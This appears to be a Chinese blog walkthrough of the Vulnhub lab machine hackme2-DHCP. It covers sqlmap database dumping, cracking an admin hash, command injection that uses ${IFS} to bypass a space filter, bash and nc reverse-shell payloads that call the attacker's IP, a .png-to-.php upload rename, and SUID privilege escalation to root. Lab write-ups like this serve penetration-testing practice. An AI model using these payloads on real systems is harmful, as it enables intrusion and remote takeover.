Vulnhub靶机:hackme2-DHCP

一、介绍

运行环境:Virtualbox(攻击机)和VMware(靶机)

攻击机:kali(192.168.56.106)

靶机:hackme2-DHCP(192.168.56.107)

目标:获取靶机root权限和flag

靶机下载地址:https://download.vulnhub.com/hackme/hackme2-DHCP.ova

二、信息收集

因为靶机导入Virtualbox会报错,所以靶机使用VMware

使用nmap主机发现,靶机ip为:192.168.56.107

netdiscover -i eth1 -r 192.168.56.0/24

在这里插入图片描述

使用nmap端口扫描发现,靶机开放端口:22、80

在这里插入图片描述

80端口:打开网站发现是一个登录界面,查看源码没有发现隐藏信息。

在这里插入图片描述

登录界面首先猜测是否存在sql注入漏洞,可以使用sqlmap跑一下,发现不存在sql注入漏洞

sqlmap -u http://192.168.56.107/login.php --forms --dbs

在这里插入图片描述

使用dirsearch工具进行目录爆破

在这里插入图片描述

有一个注册页面,我们可以注册一个账号,登录,看看登录后有没有可利用的点

在这里插入图片描述

在这里插入图片描述

三、漏洞利用

登录后,发现存在一个查找book的功能点,怀疑存在sql注入漏洞,使用burpsuite截取该功能点的数据包,保存在post.txt里面,使用sqlmap工具进行测试,存在sql注入

sqlmap -r post.txt --dbs
sqlmap -r post.txt -D webapphacking --tables
sqlmap -r post.txt -D webapphacking -T users --dump

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现管理员账号的用户名和加密的密码,可以使用在线MD5解密网站进行解密

superadmin:2386acb2cf356944177746fc92523983

解密得到:Uncrackable

在这里插入图片描述

管理员账号登录网站,登录后发现存在文件上传功能点,直接上传webshell

在这里插入图片描述

发现上传失败,只能上传图片文件

在这里插入图片描述

页面下面有一个搜索用户活动的功能点,可已尝试判断是否存在XSS、命令注入、模板注入等漏洞,测试命令注入,输入6*6、5*6,可以发现5*6执行了等于 30,说明Last Name:存在命令注入。

在这里插入图片描述
在这里插入图片描述

可以尝试使用命令注入反弹shell,发现靶机命令注入过滤了空格

在这里插入图片描述

可以使用${IFS}绕过空格过滤

system('which${IFS}nc')

在这里插入图片描述

反弹shell,尝试过很多命令但都失败

system('nc${IFS}-e${IFS}/bin/bash${IFS}192.168.56.106${IFS}4444')

system("bash${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.56.106/4444${IFS}0>&1")

system("bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/192.168.56.106/4444${IFS}0>&1'")

system('nc${IFS}-c${IFS}bash${IFS}192.168.56.106${IFS}4444')

先将shell文件的后缀修改为png,并上传到靶机,然后使用命令注入将上传的shell后缀修改回php,进行反弹shell

system('ls${IFS}uploads')
system('ls${IFS}uploads/year2020')
system('mv${IFS}uploads/year2020/shell.png${IFS}uploads/year2020/shell.php')

在这里插入图片描述
在这里插入图片描述

修改后缀,修改成功

在这里插入图片描述
在这里插入图片描述

访问shell.php,反弹shell

shell的路径:/uploads/year2020/shell.php

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

查看是否存在特权命令,和具有可利用的root权限的文件,发现一个可疑文件/home/legacy/touchmenot

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

直接执行该文件,获得root权限

在这里插入图片描述

未发现flag

参考链接:靶机渗透 HACKME-2 _hackme2-CSDN博客

  • 19
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值